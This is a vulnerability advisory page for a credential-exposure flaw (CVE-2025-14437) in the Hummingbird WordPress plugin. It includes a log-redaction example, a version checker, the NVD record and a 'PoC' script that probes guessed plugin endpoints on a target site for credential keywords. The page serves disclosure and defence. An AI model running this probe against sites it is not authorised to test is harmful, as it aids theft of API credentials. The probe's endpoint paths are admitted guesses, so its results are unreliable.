Security Vulnerability Report
CVE-2025-14437 CVSS 7.5 HIGH

CVE-2025-14437

Published: 2025-12-18 13:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Hummingbird Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.18.0 via the 'request' function. This makes it possible for unauthenticated attackers to extract sensitive data including Cloudflare API credentials.
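The advisory text does not say where the credentials become readable; the NVD record reproduced further down this page files the weakness as CWE-532, insertion of sensitive information into a log file. The block below is an added illustration of the fix for that weakness class, not code from the Hummingbird plugin: an outbound API request is serialised for a debug log once as-is (the CWE-532 pattern) and once after redaction. It assumes Cloudflare-style authentication headers (Authorization: Bearer, or the legacy X-Auth-Key / X-Auth-Email pair; which one the plugin uses is not stated on this page) and runs on a constructed request with a placeholder token.

```python
"""Redact credentials before a request is written to a log (CWE-532 fix pattern).

Added example, not the plugin's code. Header names and the sample request are
assumptions for illustration; the token value is a placeholder, not a real key.
"""
import json
import re
from typing import Any, Optional

# Header / field names whose values must never reach a log. Compared
# case-insensitively with '-' and '_' treated alike (see _norm).
SENSITIVE_KEYS = {
    "authorization", "x_auth_key", "x_auth_email",
    "api_key", "apikey", "api_token", "token", "secret", "password",
}
# Credentials embedded in free-form strings (debug messages, pasted curl lines).
BEARER_RE = re.compile(r"Bearer\s+[A-Za-z0-9._~+/=-]+")
PLACEHOLDER = "[REDACTED]"


def _norm(key: str) -> str:
    return key.lower().replace("-", "_")


def redact(value: Any, key: Optional[str] = None) -> Any:
    """Return a deep copy of `value` that is safe to log.

    Values stored under a key in SENSITIVE_KEYS are replaced wholesale;
    every other string is scrubbed of 'Bearer <token>' fragments.
    """
    if isinstance(value, dict):
        return {k: redact(v, k) for k, v in value.items()}
    if isinstance(value, (list, tuple)):
        return [redact(v, key) for v in value]
    if isinstance(value, str):
        if key is not None and _norm(key) in SENSITIVE_KEYS:
            return PLACEHOLDER
        return BEARER_RE.sub("Bearer " + PLACEHOLDER, value)
    return value


def log_line_unsafe(method: str, url: str, headers: dict, body: dict) -> str:
    """The CWE-532 pattern: the whole outbound request, credentials included,
    is serialised into a log that may later be world-readable."""
    record = {"method": method, "url": url, "headers": headers, "body": body}
    return json.dumps(record)


def log_line_safe(method: str, url: str, headers: dict, body: dict) -> str:
    """Same record, redacted before serialisation."""
    record = {"method": method, "url": url, "headers": headers, "body": body}
    return json.dumps(redact(record))


# Constructed sample request (assumed Cloudflare-style headers, placeholder token).
SAMPLE_URL = "https://api.cloudflare.com/client/v4/zones/ZONE_ID/purge_cache"
SAMPLE_HEADERS = {
    "Authorization": "Bearer cf_example_token_0123456789",
    "X-Auth-Email": "admin@example.com",
    "Content-Type": "application/json",
}
SAMPLE_BODY = {
    "purge_everything": True,
    # a free-form field that happens to carry a token: still scrubbed
    "note": "retry with Bearer cf_example_token_0123456789",
}

if __name__ == "__main__":
    print("unsafe:", log_line_unsafe("POST", SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY))
    print("safe:  ", log_line_safe("POST", SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY))
```

Redaction is keyed on field names first and on string patterns second because a secret can arrive in a field nobody thought of (a note, an exception message, a retried-request dump); the allow-nothing default for known credential headers is what keeps the log useful without ever carrying the key.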

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Hummingbird Performance plugin for WordPress, all versions up to and including 3.18.0 (the NVD record on this page carries no CPE configuration data; the range is taken from the description).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-14437 PoC - Hummingbird Performance Plugin Information Disclosure
# Author: Security Research
# Note: For authorized security testing only
#
# This is a heuristic probe: it requests a few candidate endpoints and greps the
# body for credential-like words. The endpoint paths are the PoC author's
# guesses and are not confirmed by the advisory, and words such as 'token'
# appear in ordinary WordPress pages too, so a hit is a lead to verify by hand,
# not proof of exposure.
import sys
from urllib.parse import urljoin

import requests
import urllib3

# verify=False is used below; silence the per-request InsecureRequestWarning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def check_vulnerability(target_url):
    """Check if target is vulnerable to CVE-2025-14437"""
    # Try multiple attack vectors
    attack_vectors = [
        # REST API endpoint
        '/wp-json/hummingbird/v1/request',
        # AJAX endpoint
        '/wp-admin/admin-ajax.php?action=hummingbird_api_request',
        # Direct plugin endpoint
        '/wp-content/plugins/hummingbird-performance/api/request.php',
    ]
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest',
    }
    # Look for API keys, tokens, or credentials in the response body
    keywords = ['cloudflare', 'api_key', 'secret', 'token', 'credential']

    for vector in attack_vectors:
        # urljoin replaces the path, so pass the site root (a WordPress installed
        # under a sub-directory needs that directory included in the vector).
        url = urljoin(target_url, vector)
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
        except requests.RequestException as e:
            print(f'[-] Error testing {vector}: {e}')
            continue

        # Only a 200 counts; WordPress answers unknown REST routes with a 404
        if response.status_code != 200:
            continue

        # Check for sensitive information in response
        response_lower = response.text.lower()
        for keyword in keywords:
            if keyword in response_lower:
                print(f'[+] VULNERABLE! Found sensitive data via {vector}')
                print(f'[+] Response contains: {keyword}')
                print(f'[+] Status: {response.status_code}')
                return True

    print('[-] Target may not be vulnerable or is patched')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-14437-poc.py <target_url>')
        print('Example: python cve-2025-14437-poc.py http://example.com')
        sys.exit(1)
    target = sys.argv[1]
    print(f'[*] Testing {target} for CVE-2025-14437')
    check_vulnerability(target)
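The PoC above decides "vulnerable" from any 200 response containing a word such as 'token', which ordinary WordPress pages also contain. A lower-noise first step is to read the installed plugin version and compare it with the range the advisory states (all releases up to and including 3.18.0). The following is an added example, not the advisory's PoC or the plugin's code. It assumes the plugin slug is hummingbird-performance (as in the Trac URL in the record) and that the plugin's readme.txt, with its 'Stable tag:' line, is readable at the default WordPress plugin path; it runs offline against a constructed readme excerpt unless a site URL is passed on the command line.

```python
#!/usr/bin/env python3
"""Version-range check for CVE-2025-14437 (added example, not the advisory's PoC).

WordPress.org plugins ship a readme.txt whose 'Stable tag:' line names the
installed release. Assumed here: the slug 'hummingbird-performance' and the
default plugin path; the affected range (<= 3.18.0) is from the advisory.
"""
import re
import sys
from typing import Optional, Tuple

README_PATH = "/wp-content/plugins/hummingbird-performance/readme.txt"  # assumption
LAST_VULNERABLE = "3.18.0"  # advisory: "up to, and including, 3.18.0"

STABLE_TAG_RE = re.compile(r"^[ \t]*Stable tag:[ \t]*(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '3.18.0', '3.18' or '3.18.1-beta1' into a comparable tuple.

    Parsing stops at the first non-numeric suffix; missing components are 0.
    """
    nums = []
    for part in text.strip().split("."):
        m = re.match(r"(\d+)(.*)", part)
        if not m:
            break
        nums.append(int(m.group(1)))
        if m.group(2):  # e.g. '1-beta1': keep the 1, ignore the suffix
            break
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def stable_tag(readme_text: str) -> Optional[str]:
    """Extract the 'Stable tag:' value from a readme.txt body, if present."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None


def is_affected(version: str) -> bool:
    """True when `version` falls inside the advisory's affected range."""
    if not re.match(r"\d", version):
        raise ValueError(f"non-numeric version: {version!r}")
    return parse_version(version) <= parse_version(LAST_VULNERABLE)


def assess(readme_text: str) -> dict:
    """Verdict for one readme body: affected True/False, or None if undecidable
    (no tag line, or a non-numeric tag such as 'trunk')."""
    tag = stable_tag(readme_text)
    if tag is None:
        return {"version": None, "affected": None, "reason": "no 'Stable tag:' line"}
    try:
        return {"version": tag, "affected": is_affected(tag),
                "reason": f"Stable tag {tag} vs <= {LAST_VULNERABLE}"}
    except ValueError:
        return {"version": tag, "affected": None, "reason": "non-numeric stable tag"}


# Constructed readme excerpt for offline use (not fetched from any site).
SAMPLE_README = """=== Hummingbird ===
Contributors: example
Requires at least: 6.0
Stable tag: 3.18.0
"""


def fetch_readme(base_url: str) -> str:
    """Fetch readme.txt from a live site; only used when a URL is given."""
    import requests  # imported lazily so the offline path needs no third-party deps
    from urllib.parse import urljoin
    r = requests.get(urljoin(base_url, README_PATH), timeout=10)
    r.raise_for_status()
    return r.text


if __name__ == "__main__":
    text = fetch_readme(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_README
    print(assess(text))
```

A Stable tag at or below 3.18.0 says the vulnerable code is present, not that Cloudflare credentials are configured or reachable; a missing or blocked readme.txt, or a 'trunk' tag, yields no verdict rather than a guess. Confirming actual exposure still requires exercising the 'request' function itself, which the advisory does not detail.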

References

https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance (WordPress.org plugin repository changeset cited by the record)
https://www.wordfence.com/threat-intel/vulnerabilities/id/8755ab3f-ee77-44ea-8620-590f1f1cb333?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14437",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-18T13:15:47.373",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Hummingbird Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.18.0 via the 'request' function. This makes it possible for unauthenticated attackers to extract sensitive data including Cloudflare API credentials."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-532"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8755ab3f-ee77-44ea-8620-590f1f1cb333?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}